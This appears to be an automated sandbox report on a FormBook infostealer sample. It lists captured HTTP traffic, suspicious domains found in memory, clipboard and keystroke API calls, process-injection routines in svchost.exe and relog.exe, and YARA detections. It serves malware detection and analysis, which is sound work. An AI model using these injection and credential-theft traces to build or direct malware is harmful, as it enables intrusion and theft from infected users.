Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 00:56:25 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Sun, 05 Jan 2025 21:39:02 GMTcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=H7h%2BaXNKt5IjUfUIYkV5mV1lVM%2Fzc7KJZhrDhs8m22hqYAgLhWJ8L8qYAGgwjRkR0dVYKKq08dbXWwztD16hQYbvWHcUSbF9r8SZtChUhvbkkohl3ec37umHJhMhA7hmhz53ae2y15E%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9000f2625fcf424d-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1601&min_rtt=1601&rtt_var=800&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=432&delivery_rate=0&cwnd=206&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 35 39 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 26 6d 64 61 73 68 3b 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 6f 72 72 79 2c 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 22 2f 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e Data Ascii: 592<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <title>404 — Not Found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/> <meta name="description" content="Sorry, page not found"/> <style type="text/css">

Source: fIydfvfomIEE.exe, 00000007.00000002.3147393601.0000000004210000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://einpisalpace.shop/
Source: fIydfvfomIEE.exe, 00000007.00000002.3149335657.0000000005981000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.aihuzhibo.net
Source: fIydfvfomIEE.exe, 00000007.00000002.3149335657.0000000005981000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.aihuzhibo.net/lkpz/
Source: firefox.exe, 00000009.00000002.1938545616.000002586EACA000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.linkdex.com/bots/)
Source: relog.exe, 00000006.00000002.3149681655.00000000074F6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: relog.exe, 00000006.00000002.3149681655.00000000074F6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: relog.exe, 00000006.00000002.3149681655.00000000074F6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: relog.exe, 00000006.00000002.3149681655.00000000074F6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: relog.exe, 00000006.00000002.3149681655.00000000074F6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/?q=
Source: relog.exe, 00000006.00000002.3149681655.00000000074F6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: relog.exe, 00000006.00000002.3149681655.00000000074F6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: relog.exe, 00000006.00000002.3145583300.00000000028A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: relog.exe, 00000006.00000002.3145583300.00000000028C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: relog.exe, 00000006.00000002.3145583300.00000000028A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: relog.exe, 00000006.00000002.3145583300.00000000028A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: relog.exe, 00000006.00000002.3145583300.00000000028A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: relog.exe, 00000006.00000002.3145583300.00000000028C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: relog.exe, 00000006.00000003.1825802896.00000000074DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: relog.exe, 00000006.00000002.3149681655.00000000074F6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: fIydfvfomIEE.exe, 00000007.00000002.3147393601.0000000003D5A000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.newbh.pro/fpja/
Source: relog.exe, 00000006.00000002.3147754299.0000000004506000.00000004.10000000.00040000.00000000.sdmp, fIydfvfomIEE.exe, 00000007.00000002.3147393601.00000000046C6000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://wx.longwaysun.com/app/register.php?site_id=2239&topId=62128/798t/
Source: relog.exe, 00000006.00000002.3147754299.0000000004506000.00000004.10000000.00040000.00000000.sdmp, fIydfvfomIEE.exe, 00000007.00000002.3147393601.00000000046C6000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://wx.longwaysun.com/app/register.php?site_id=2239&topId=62128/798t/

Source: C:\Users\user\Desktop\XeFYBYYj0w.exe

Code function: 0_2_00A84164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_00A84164

Source: C:\Users\user\Desktop\XeFYBYYj0w.exe

Code function: 0_2_00A84164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_00A84164

Source: C:\Users\user\Desktop\XeFYBYYj0w.exe

Code function: 0_2_00A83F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

0_2_00A83F66

Source: C:\Users\user\Desktop\XeFYBYYj0w.exe

Code function: 0_2_00A7001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,

0_2_00A7001C

Source: C:\Users\user\Desktop\XeFYBYYj0w.exe

Code function: 0_2_00A9CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

0_2_00A9CABC

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.3149335657.00000000058F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3145337873.0000000002770000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3145033893.0000000000490000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3145403787.00000000027C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1640145384.0000000003650000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1639166335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1640191326.0000000003A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3146582486.0000000002E90000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

System Summary

Binary is likely a compiled AutoIt script file

Source: C:\Users\user\Desktop\XeFYBYYj0w.exe	Code function: This is a third-party compiled AutoIt script.	0_2_00A13B3A
Source: XeFYBYYj0w.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: XeFYBYYj0w.exe, 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_c5e8ca63-4
Source: XeFYBYYj0w.exe, 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_f5998ad3-6
Source: XeFYBYYj0w.exe	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_70d71926-f
Source: XeFYBYYj0w.exe	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_3af82c76-4

Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0042C4A3 NtClose,	3_2_0042C4A3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03372B60 NtClose,LdrInitializeThunk,	3_2_03372B60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03372DF0 NtQuerySystemInformation,LdrInitializeThunk,	3_2_03372DF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033735C0 NtCreateMutant,LdrInitializeThunk,	3_2_033735C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03374340 NtSetContextThread,	3_2_03374340
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03374650 NtSuspendThread,	3_2_03374650
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03372BA0 NtEnumerateValueKey,	3_2_03372BA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03372B80 NtQueryInformationFile,	3_2_03372B80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03372BF0 NtAllocateVirtualMemory,	3_2_03372BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03372BE0 NtQueryValueKey,	3_2_03372BE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03372AB0 NtWaitForSingleObject,	3_2_03372AB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03372AF0 NtWriteFile,	3_2_03372AF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03372AD0 NtReadFile,	3_2_03372AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03372F30 NtCreateSection,	3_2_03372F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03372F60 NtCreateProcessEx,	3_2_03372F60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03372FB0 NtResumeThread,	3_2_03372FB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03372FA0 NtQuerySection,	3_2_03372FA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03372F90 NtProtectVirtualMemory,	3_2_03372F90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03372FE0 NtCreateFile,	3_2_03372FE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03372E30 NtWriteVirtualMemory,	3_2_03372E30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03372EA0 NtAdjustPrivilegesToken,	3_2_03372EA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03372E80 NtReadVirtualMemory,	3_2_03372E80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03372EE0 NtQueueApcThread,	3_2_03372EE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03372D30 NtUnmapViewOfSection,	3_2_03372D30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03372D10 NtMapViewOfSection,	3_2_03372D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03372D00 NtSetInformationFile,	3_2_03372D00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03372DB0 NtEnumerateKey,	3_2_03372DB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03372DD0 NtDelayExecution,	3_2_03372DD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03372C00 NtQueryInformationProcess,	3_2_03372C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03372C70 NtFreeVirtualMemory,	3_2_03372C70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03372C60 NtCreateKey,	3_2_03372C60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03372CA0 NtQueryInformationToken,	3_2_03372CA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03372CF0 NtOpenProcess,	3_2_03372CF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03372CC0 NtQueryVirtualMemory,	3_2_03372CC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03373010 NtOpenDirectoryObject,	3_2_03373010
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03373090 NtSetValueKey,	3_2_03373090
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033739B0 NtGetContextThread,	3_2_033739B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03373D10 NtOpenProcessToken,	3_2_03373D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03373D70 NtOpenThread,	3_2_03373D70
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02D44340 NtSetContextThread,LdrInitializeThunk,	6_2_02D44340
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02D44650 NtSuspendThread,LdrInitializeThunk,	6_2_02D44650
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02D42AD0 NtReadFile,LdrInitializeThunk,	6_2_02D42AD0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02D42AF0 NtWriteFile,LdrInitializeThunk,	6_2_02D42AF0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02D42BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	6_2_02D42BF0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02D42BE0 NtQueryValueKey,LdrInitializeThunk,	6_2_02D42BE0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02D42BA0 NtEnumerateValueKey,LdrInitializeThunk,	6_2_02D42BA0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02D42B60 NtClose,LdrInitializeThunk,	6_2_02D42B60
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02D42EE0 NtQueueApcThread,LdrInitializeThunk,	6_2_02D42EE0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02D42E80 NtReadVirtualMemory,LdrInitializeThunk,	6_2_02D42E80
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02D42FE0 NtCreateFile,LdrInitializeThunk,	6_2_02D42FE0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02D42FB0 NtResumeThread,LdrInitializeThunk,	6_2_02D42FB0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02D42F30 NtCreateSection,LdrInitializeThunk,	6_2_02D42F30
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02D42CA0 NtQueryInformationToken,LdrInitializeThunk,	6_2_02D42CA0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02D42C70 NtFreeVirtualMemory,LdrInitializeThunk,	6_2_02D42C70
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02D42C60 NtCreateKey,LdrInitializeThunk,	6_2_02D42C60
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02D42DD0 NtDelayExecution,LdrInitializeThunk,	6_2_02D42DD0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02D42DF0 NtQuerySystemInformation,LdrInitializeThunk,	6_2_02D42DF0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02D42D10 NtMapViewOfSection,LdrInitializeThunk,	6_2_02D42D10
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02D42D30 NtUnmapViewOfSection,LdrInitializeThunk,	6_2_02D42D30
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02D435C0 NtCreateMutant,LdrInitializeThunk,	6_2_02D435C0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02D439B0 NtGetContextThread,LdrInitializeThunk,	6_2_02D439B0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02D42AB0 NtWaitForSingleObject,	6_2_02D42AB0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02D42B80 NtQueryInformationFile,	6_2_02D42B80
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02D42EA0 NtAdjustPrivilegesToken,	6_2_02D42EA0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02D42E30 NtWriteVirtualMemory,	6_2_02D42E30
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02D42F90 NtProtectVirtualMemory,	6_2_02D42F90
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02D42FA0 NtQuerySection,	6_2_02D42FA0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02D42F60 NtCreateProcessEx,	6_2_02D42F60
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02D42CC0 NtQueryVirtualMemory,	6_2_02D42CC0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02D42CF0 NtOpenProcess,	6_2_02D42CF0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02D42C00 NtQueryInformationProcess,	6_2_02D42C00
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02D42DB0 NtEnumerateKey,	6_2_02D42DB0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02D42D00 NtSetInformationFile,	6_2_02D42D00
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02D43090 NtSetValueKey,	6_2_02D43090
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02D43010 NtOpenDirectoryObject,	6_2_02D43010
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02D43D70 NtOpenThread,	6_2_02D43D70
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02D43D10 NtOpenProcessToken,	6_2_02D43D10
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_004B8F10 NtCreateFile,	6_2_004B8F10
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_004B9080 NtReadFile,	6_2_004B9080
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_004B9170 NtDeleteFile,	6_2_004B9170
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_004B9220 NtClose,	6_2_004B9220
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_004B9380 NtAllocateVirtualMemory,	6_2_004B9380
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02B2F7D8 NtClose,	6_2_02B2F7D8

Source: C:\Users\user\Desktop\XeFYBYYj0w.exe

Code function: 0_2_00A7A1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,

0_2_00A7A1EF

Source: C:\Users\user\Desktop\XeFYBYYj0w.exe

Code function: 0_2_00A68310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

0_2_00A68310

Source: C:\Users\user\Desktop\XeFYBYYj0w.exe

Code function: 0_2_00A751BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,

0_2_00A751BD

Source: C:\Users\user\Desktop\XeFYBYYj0w.exe	Code function: 0_2_00A1E6A0	0_2_00A1E6A0
Source: C:\Users\user\Desktop\XeFYBYYj0w.exe	Code function: 0_2_00A3D975	0_2_00A3D975
Source: C:\Users\user\Desktop\XeFYBYYj0w.exe	Code function: 0_2_00A1FCE0	0_2_00A1FCE0
Source: C:\Users\user\Desktop\XeFYBYYj0w.exe	Code function: 0_2_00A321C5	0_2_00A321C5
Source: C:\Users\user\Desktop\XeFYBYYj0w.exe	Code function: 0_2_00A462D2	0_2_00A462D2
Source: C:\Users\user\Desktop\XeFYBYYj0w.exe	Code function: 0_2_00A903DA	0_2_00A903DA
Source: C:\Users\user\Desktop\XeFYBYYj0w.exe	Code function: 0_2_00A4242E	0_2_00A4242E
Source: C:\Users\user\Desktop\XeFYBYYj0w.exe	Code function: 0_2_00A325FA	0_2_00A325FA
Source: C:\Users\user\Desktop\XeFYBYYj0w.exe	Code function: 0_2_00A266E1	0_2_00A266E1
Source: C:\Users\user\Desktop\XeFYBYYj0w.exe	Code function: 0_2_00A6E616	0_2_00A6E616
Source: C:\Users\user\Desktop\XeFYBYYj0w.exe	Code function: 0_2_00A4878F	0_2_00A4878F
Source: C:\Users\user\Desktop\XeFYBYYj0w.exe	Code function: 0_2_00A78889	0_2_00A78889
Source: C:\Users\user\Desktop\XeFYBYYj0w.exe	Code function: 0_2_00A28808	0_2_00A28808
Source: C:\Users\user\Desktop\XeFYBYYj0w.exe	Code function: 0_2_00A46844	0_2_00A46844
Source: C:\Users\user\Desktop\XeFYBYYj0w.exe	Code function: 0_2_00A90857	0_2_00A90857
Source: C:\Users\user\Desktop\XeFYBYYj0w.exe	Code function: 0_2_00A3CB21	0_2_00A3CB21
Source: C:\Users\user\Desktop\XeFYBYYj0w.exe	Code function: 0_2_00A46DB6	0_2_00A46DB6
Source: C:\Users\user\Desktop\XeFYBYYj0w.exe	Code function: 0_2_00A26F9E	0_2_00A26F9E
Source: C:\Users\user\Desktop\XeFYBYYj0w.exe	Code function: 0_2_00A23030	0_2_00A23030
Source: C:\Users\user\Desktop\XeFYBYYj0w.exe	Code function: 0_2_00A33187	0_2_00A33187
Source: C:\Users\user\Desktop\XeFYBYYj0w.exe	Code function: 0_2_00A3F1D9	0_2_00A3F1D9
Source: C:\Users\user\Desktop\XeFYBYYj0w.exe	Code function: 0_2_00A11287	0_2_00A11287
Source: C:\Users\user\Desktop\XeFYBYYj0w.exe	Code function: 0_2_00A31484	0_2_00A31484
Source: C:\Users\user\Desktop\XeFYBYYj0w.exe	Code function: 0_2_00A25520	0_2_00A25520
Source: C:\Users\user\Desktop\XeFYBYYj0w.exe	Code function: 0_2_00A37696	0_2_00A37696
Source: C:\Users\user\Desktop\XeFYBYYj0w.exe	Code function: 0_2_00A25760	0_2_00A25760
Source: C:\Users\user\Desktop\XeFYBYYj0w.exe	Code function: 0_2_00A31978	0_2_00A31978
Source: C:\Users\user\Desktop\XeFYBYYj0w.exe	Code function: 0_2_00A49AB5	0_2_00A49AB5
Source: C:\Users\user\Desktop\XeFYBYYj0w.exe	Code function: 0_2_00A3BDA6	0_2_00A3BDA6
Source: C:\Users\user\Desktop\XeFYBYYj0w.exe	Code function: 0_2_00A31D90	0_2_00A31D90
Source: C:\Users\user\Desktop\XeFYBYYj0w.exe	Code function: 0_2_00A97DDB	0_2_00A97DDB
Source: C:\Users\user\Desktop\XeFYBYYj0w.exe	Code function: 0_2_00A23FE0	0_2_00A23FE0
Source: C:\Users\user\Desktop\XeFYBYYj0w.exe	Code function: 0_2_00A1DF00	0_2_00A1DF00
Source: C:\Users\user\Desktop\XeFYBYYj0w.exe	Code function: 0_2_0114C540	0_2_0114C540
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_00418393	3_2_00418393
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_004010B1	3_2_004010B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0042EAE3	3_2_0042EAE3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0040FB93	3_2_0040FB93
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_00402399	3_2_00402399
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_004023A0	3_2_004023A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_00416593	3_2_00416593
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0040DD93	3_2_0040DD93
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0040FDB3	3_2_0040FDB3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0040DEDF	3_2_0040DEDF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_004026E0	3_2_004026E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0040DEE3	3_2_0040DEE3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_00402FE0	3_2_00402FE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033FA352	3_2_033FA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034003E6	3_2_034003E6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0334E3F0	3_2_0334E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033E0274	3_2_033E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033C02C0	3_2_033C02C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033DA118	3_2_033DA118
